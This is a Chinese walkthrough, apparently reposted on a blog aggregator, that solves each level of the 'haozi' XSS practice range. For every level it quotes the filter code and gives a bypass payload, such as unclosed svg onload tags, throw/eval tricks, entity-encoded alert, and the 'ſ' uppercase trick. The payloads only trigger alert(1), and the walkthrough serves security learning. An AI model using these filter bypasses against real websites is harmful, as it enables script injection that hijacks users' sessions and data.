XSS haozi靶场通关笔记

news2024/11/22 22:07:03

XSS靶场地址:alert(1)

靶场的要求是输出一个内容为1的弹窗;这个靶场限制了输入位置只能是input code;而且浏览器发送内容时会自动进行url编码;所以重点考察的是代码的分析和基础payload构造;一切完成在当前页面;没办法进行url编码绕过或者bp抓包修改;是磨练基础的宝刀。

祝各位玩的愉快,能够从靶场中学到更多的东西

靶场中冷知识整理:

  • html注释符:<!-- -->和<!-- --!>
  • 不闭合标签可执行:<img src οnerrοr="alert(1)"
  • 加空格的闭合标签可使用:</style     >
  • 单行注释:可用 -->
  • 事件执行内容可以有多个:用,或;分割就行
  • s的古英文是ſ;变成大写都是S
  • alert()只能是小写;大写不执行;ALERT()不识别
  • <script>内容</script>:标签中间的内容不识别带编码的内容
  • 回车换行可以打断对字符串以开头和结尾进行判断的验证
  • 利用实体编码可以绕过大写转换

0X00

这一关属于新手友好关;没有任何的限制内容,直接构造payload:<script>alert(1)</script>即可

因为没有任何验证,所以绕过方法比较多,可以自行尝试

0X01

这一关使用了<textarea>标签,输入的内容都会直接当成文本输出;但是未作任何的过滤;可以进行标签闭合;直接构造payload:<textarea><script>alert(1)</script>

0X02

这一关是一个input标签;没有对输入做任何的过滤;可以进行双引号绕过或者标签闭合绕过

直接构造payload:" οnfοcus=alert(1) autofocus "   //这里的autofocus加不加都行

0X03

这一关对小括号进行了过滤;将小括号换成了空字符;可以进行反引号绕过或者throw绕过

构造payload:<script>alert`1`</script>  //反引号是esc下面的按钮

通过throw进行绕过;构造payload:<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

主要掌握throw绕过的写法,标签换成其他的也可以

0X04

这一关对括号和反引号都进行过滤了;那考察的就是throw绕过了

直接构造payload:<img src οnerrοr="window.οnerrοr=eval;throw'=alert\x281\x29';">

0X05

这关把html中的注释符闭合标签过滤了;即-->被过滤了,而且把输入的内容放到了注释标签中;

输入的东西都会被注释掉,只能进行标签闭合;这个知识点很冷门了;(看了大佬的wp才知道)html注释符有两种写法:<!-- -->和<!-- --!>;可以使用--!>进行闭合(学到了)

构造payload:--!><script>alert(1)</script>

0X06

简单分析一下源码:

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

通过源码进行分析,主要看正则判断auto|on.*=|>的含义;/ /g是正则表达式的含义 /i是不区分大小写;这里过滤的是以auto或者on开头=结尾的字符串或者>;这些字符会被替换成_;我直接输入οnfοcus=alert(1)不会有结果,具体如下图;

但是这里忽略了换行符;可以利用回车绕过;

直接构造payload:onfocus    
=alert(1);

0X07

简单分析源码:

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

正则表达式总匹配符解析:

.用来匹配出换行符\n以外的任意字符
*用来匹配前面的子表达式任意次
+用来匹配前面的子表达式一次或多次(大于等于1次)
?用来匹配前面的子表达式零次或一次

源码解析:<\/?[^>]+>

\是用来转义/的,<\/?的意思是匹配<和</;[^]是匹配不在括号的内容;[^>]+的意思是至少存在一次非>的内容;整体的含义是匹配<内容>或者</内容>;当然,前者是包含后者的

那就麻烦了;构造xss payload肯定得用到标签啊,百思不得其解;后来看了大佬的wp;发现标签不闭合也能执行;离了个大谱

直接构造payload:<svg/οnlοad=alert(1)  或者<svg οnlοad=alert(1)

这个标签payload是最少的,我最喜欢用的;如果这样构造不成功的话就在最后敲一个回车;有时是靶场的判断问题

0X08

简单分析一下源码:

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

这里是将</style>标签进行转换了;style标签是设置样式的,不能直接在其中嵌套标签;必须得进行闭合才行啊;直接用</style>看效果;发现被替换成了坏人;

那如何进行标签闭合呢?在</style>中的style后面加上一个或多个空格就能绕过;而且标签可以正常使用;讲实话真的学到了,这小知识真的一讲一个不知道

直接构造payload:</style ><img src="" οnerrοr=alert(1) >

0X09

简单分析源码:

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

注意:这里的^表示的是开头的意思;只有在[]中才表示非的意思;

也就是说该源码判断的是输入字符串是否是以http://www.segmentfault.com这个字符串开头的;如果匹配的话才将输入放大<script>标签中;这就简单了;可以用""绕过

直接构造payload:http://www.segmentfault.com" οnerrοr="alert(1)

0X0A

简单分析源码:

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'

以上源码分为两部分:特殊字符转换和头部字符串验证

该源码将&/'"<>等转为了实体编码;也就是不能通过双引号和标签闭合进行绕过了;这真的没思路了;看了大佬的wp才知道当前网站下有一个j.js和J.JS的文件,里面的内容就是alert(1);这谁想得到啊

直接构造payload:https://www.segmentfault.com.haozi.me/j.js

0X0B

简单分析源码:

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

这里对输入的内容都进行了大写转换

这里有个冷知识:alert()函数只能是小写;ALERT()是不执行的

这里发现在html源码中实体编码是原样保存的;没经过转换;那么页面输出时会自动进行转化;可以用实体编码绕过

直接构造payload:</H1> <img src=M οnerrοr=&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;(1)>

0X0C

简单进行源码分析:

function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

可以发现这里把script替换为空;然后又把替换后的字符串进行大写转换

思路:如果用<script>标签的话可以考虑利用双写绕过script的过滤;然后实体编码绕过ALERT()

我习惯直接用img标签或svg标签;单标签写起来舒服;直接实体编码绕过就行了

方法1:利用<script>标签绕过

直接构造payload:</H1> <scrscriptipt src οnerrοr=&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;(1)></scrscriptipt>

alert(1)编码后只能通过事件进行触发,不能够在<script>alert(1)</script>内部触发;这里有点儿小疑问;可能是环境的问题

方法2:利用<img>标签绕过

直接构造payload:</H1> <img src οnerrοr=&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;(1)>

方法3:利用<svg>标签绕过;

直接构造payload:</H1> <svg οnlοad=&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;(1)>

0X0D

简单分析源码:

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

源码中对</'"进行了过滤,而且输入内容在单行注释标签下;//注释可以用回车进行绕过;但是由于后面的')存在无法让输入的执行;小脑萎缩了呀;</被过滤了,不能用//或者/*了,<也过滤了,不能对下面的标签进行闭合处理;看了大佬的wp发现可以用-->进行注释;真的学到了

直接构造payload:
alert(1);
-->

注意:第一行是回车键;-->是注释一整行,所以换行进行注释

0X0E

简单进行源码分析:

function render (input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

直接对<+字母组合进行过滤;任何标签都废了;替换完后还进行大写转换;这一刻真的小脑萎缩了;烦躁,没思路;看了大佬的wp直呼牛P;这题目真的是被玩明白的了

利用古英文(古拉丁文)中的一个字符:ſ

该字符是s的另一种写法;他的大写是S;这个思路真的清奇

直接构造payload:<ſvg/οnlοad=&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;>

0X0F

简单对源码分析:

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src οnerrοr="console.error('${escapeHtml(input)}')">`
}

console.error()函数是在控制台打印错误信息;由于特殊字符都被进行了实体编码;所以没办法进行标签闭合;可以考虑)闭合console.error()函数;然后用逗号或分号进行分割,再输入想要执行的程序,最后用//将后面内容注释掉;这里利用的就是标签不闭合也能执行

直接构造payload:'),alert(1); //

0X10

简单分析源码:

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

没有任何过滤;直接将输入数据读取到了标签中;和第一关一样

直接构造payload:alert(1)

0X11

简单进行源码分析:

// from alf.nu
function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}

对输入的特殊字符进行了转义处理;并都添加了反斜杠;重点还是要绕过console.log();

在尝试的时候发现//虽然被转义成了\/\/,但是还能实现注释效果

直接构造payload:"); alert(1) //

0X12

简单分析源码:

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

源码中只对双引号进行了替换;加了转义字符;可以直接用\"绕过;相当于将替换后的\进行转义;使其失效;

直接构造payload:\");alert(1)//

10

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1432061.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

毫米波雷达在汽车领域的原理、优势和未来趋势

1 毫米波雷达的原理 汽车引入毫米波雷达最初主要是为了实现盲点监测和定距巡航。毫米波实质上是电磁波&#xff0c;其频段位于无线电和可见光、红外线之间&#xff0c;频率范围为10GHz-200GHz。工作原理类似一般雷达&#xff0c;通过发射无线电波并接收回波&#xff0c;利用障…

Dynamo根据几何相交对墙体进行分组——群问题整理002

你好&#xff0c;这里是 BIM 的乐趣&#xff0c;我是九哥~ 近期给大家分享一些短平快的小教程&#xff0c;基本都是来自群里面常问的问题&#xff0c;不做过多的介绍了&#xff0c;直接上截图和代码。 问题&#xff1a;002 - 根据几何相交对墙体进行分组 今天分享的&#xff0…

C++后端开发之Sylar学习二:配置VSCode远程连接Ubuntu开发

C后端开发之Sylar学习二&#xff1a;配置VSCode远程连接Ubuntu开发 没错&#xff0c;我不能像大佬那样直接在Ubuntu上面用Vim手搓代码&#xff0c;只能在本地配置一下VSCode远程连接Ubuntu进行开发咯&#xff01; 本篇主要是讲解了VSCode如何配置ssh连接Ubuntu&#xff0c;还有…

【文件增量备份系统】前端项目构建

文章目录 创建项目安装项目依赖引入element plus组件下载组件在main.js中使用组件测试 整合路由router下载组件创建路由管理器index.js使用路由App.vue上面使用 <router-view />测试 整合axios下载组件工具类axiosRequest.js工具类使用 创建项目 damwangrunqindeMBP dev…

PyTorch 2.2 中文官方教程(十四)

参数化教程 原文&#xff1a; 译者&#xff1a;飞龙 协议&#xff1a;CC BY-NC-SA 4.0 作者&#xff1a;Mario Lezcano 注意 点击这里下载完整示例代码 在本教程中&#xff0c;您将学习如何实现并使用此模式来对模型进行约束。这样做就像编写自己的nn.Module一样容易。 对深…

Mybatis基础教程及使用细节

本篇主要对Mybatis基础使用进行总结&#xff0c;包括Mybatis的基础操作&#xff0c;使用注解进行增删改查的练习&#xff1b;详细介绍xml映射文件配置过程并且使用xml映射文件进行动态sql语句进行条件查询&#xff1b;为了简化java开发提高效率&#xff0c;介绍一下依赖&#x…

树莓派5一键安装C++版本OpenCV

安装环境 本人当前的安装环境&#xff1a; 树莓派5Raspberry Pi os (64-bit) Debian12 Bookworm 镜像下载地址 我这里是将镜像安装好后直接安装opencv&#xff0c;如果不是刚安装好的镜像需要注意是否有openCV的python之类的安装过&#xff0c;不然可能出现编译错误 一、扩展内…

vue3+threejs+koa可视化项目——模型文件上传(第四步)

文章目录 ⭐前言&#x1f496;往期node系列文章&#x1f496;threejs系列相关文章&#x1f496;vue3threejs系列 ⭐koa后端文件上传(koa-body)&#x1f496;自动创建目录&#x1f496;自定义目录上传&#x1f496;apifox自测上传接口 ⭐vue3前端上传模型文件&#x1f496; axio…

echarts使用之饼图(四)

1 基本使用 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><meta http-equiv"X-UA-Compatible" cont…

latex multirow学习

今天搞了一晚上的这个multirow&#xff0c;总算弄出来了几个比较好的例子&#xff0c;主要是这个multirow的语法我没看懂&#xff0c;这个逻辑我是没理解&#xff0c;就很尴尬&#xff0c;一改就报错&#xff0c;只能先弄几个例子&#xff0c;自己慢慢试 \documentclass{artic…

k8s学习-Kubernetes的网络

Kubernetes作为编排引擎管理着分布在不同节点上的容器和Pod。Pod、Service、外部组件之间需要⼀种可靠的方找到彼此并进行通信&#xff0c;Kubernetes网络则负责提供这个保障。1.1 Kubernetes网络模型 Container-to-Container的网络 当Pod被调度到某个节点&#xff0c;Pod中的…

【Python】【完整代码】解析Excel 文件中的内容并检查是否包含某字符串,并返回判断结果

示例&#xff1a; 开发需求&#xff1a;解析Excel 文件中的内容并检查是否包含 "Fail" 字符&#xff0c;若没有则返回True&#xff0c;若有则返回False 实现代码&#xff1a; #!/usr/bin/env python3 # -*- encoding: utf-8 -*-File : check_excel_for_fail.py Ti…

后端程序员入门react笔记——react的生命周期(二)

React常用的钩子函数 constructor 这个函数我们太常见了&#xff0c;在初始化类的state的时候&#xff0c;或者初始化类的props的时候都会用到&#xff0c;就是一个类的构造函数。对后端人员来说很熟悉 constructor() {super();this.state {age: 18}}getDerivedStateFromPro…

【C++入门学习指南】:函数重载提升代码清晰度与灵活性

&#x1f3a5; 屿小夏 &#xff1a; 个人主页 &#x1f525;个人专栏 &#xff1a; C入门到进阶 &#x1f304; 莫道桑榆晚&#xff0c;为霞尚满天&#xff01; 文章目录 &#x1f4d1;前言一、函数重载1.1 函数重载的概念1.2 函数重载的作用1.3 C支持函数重载的原理1.4 扩展 &…

如何写好论文——(15)如何写研究目标之实例讲解

写好研究目标一要有方向、二要有边界。 定边界的时候要有方法和结论。 下面的例子为目标的两种写法&#xff0c;第二种提供了更明确可以测量的目标。 下面的第二个例子更有方向性。第一个例子的本质是去验证一种假说&#xff0c;这种假说如果成立完全可以支撑第二种写法中的目…

【C/C++ 08】简单计算器

一、题目 输入算术表达式&#xff0c;可包含空格&#xff0c;检查算术表达式的合法性&#xff0c;若算术表达式不合法&#xff0c;打印错误类型&#xff0c;若合法&#xff0c;则进行运算&#xff0c;打印计算结果。 二、算法 1. 将输入的算术表达式字符串去除空格。 2. 检查…

Java并发(二十三)----同步模式之保护性暂停

1、定义 即 Guarded Suspension&#xff0c;用在一个线程等待另一个线程的执行结果 要点 有一个结果需要从一个线程传递到另一个线程&#xff0c;让他们关联同一个 GuardedObject 如果有结果不断从一个线程到另一个线程那么可以使用消息队列 JDK 中&#xff0c;join 的实现…

【MySQL】学习并使用DQL实现排序查询和分页查询

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” #mermaid-svg-SP91zTA41FlGU0Ce {font-family:"trebuchet ms",verdana,arial,sans-serif;font-siz…

【Linux进程间通信】匿名管道

【Linux进程间通信】匿名管道 目录 【Linux进程间通信】匿名管道进程间通信介绍进程间通信目的进程间通信发展进程间通信分类 管道用fork来共享管道原理站在文件描述符角度——深度理解管道站在内核角度——管道本质 匿名管道在myshell中添加管道的实现&#xff1a;管道读写规则…

Linux 多线程 | 线程的概念

线程的概念 线程是一个执行分支&#xff0c;执行粒度比进程更细&#xff0c;调度成本更低&#xff1b; 线程是进程内部的一个执行流&#xff1b; 线程是CPU调度的基本单位&#xff0c;进程是承担分配系统资源的基本实体。 之前我们学习过虚拟地址空间的知识&#xff0c;知道…